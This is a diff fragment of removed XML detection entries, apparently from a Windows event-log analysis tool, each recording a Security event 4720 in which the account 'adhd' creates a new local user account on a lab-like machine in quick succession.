-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:07.9266630Z'/&gt;&lt;EventRecordID&gt;5095&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Christopher&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1175&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Christopher&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Christopher</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5089</recordid>
-            <time>2020-06-11 22:05:07.839378000Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:07.8393780Z'/&gt;&lt;EventRecordID&gt;5089&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Michael&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1174&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Michael&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Michael</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5083</recordid>
-            <time>2020-06-11 22:05:07.742897300Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:07.7428973Z'/&gt;&lt;EventRecordID&gt;5083&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Arthur&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1173&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Arthur&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Arthur</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5077</recordid>
-            <time>2020-06-11 22:05:07.656725400Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:07.6567254Z'/&gt;&lt;EventRecordID&gt;5077&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Ann&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1172&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Ann&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Ann</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5071</recordid>
-            <time>2020-06-11 22:05:07.529393300Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:07.5293933Z'/&gt;&lt;EventRecordID&gt;5071&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Natalie&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1171&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Natalie&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Natalie</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5065</recordid>
-            <time>2020-06-11 22:05:07.448398300Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:07.4483983Z'/&gt;&lt;EventRecordID&gt;5065&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Cynthia&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1170&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Cynthia&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Cynthia</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5059</recordid>
-            <time>2020-06-11 22:05:07.363225800Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:07.3632258Z'/&gt;&lt;EventRecordID&gt;5059&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Noah&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1169&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Noah&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Noah</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5053</recordid>
-            <time>2020-06-11 22:05:07.264639100Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:07.2646391Z'/&gt;&lt;EventRecordID&gt;5053&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Terry&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1168&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Terry&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Terry</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5047</recordid>
-            <time>2020-06-11 22:05:07.137208500Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:07.1372085Z'/&gt;&lt;EventRecordID&gt;5047&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Virginia&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1167&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Virginia&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Virginia</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5041</recordid>
-            <time>2020-06-11 22:05:07.65141400Z</time>
-            <channel>Security</channel>
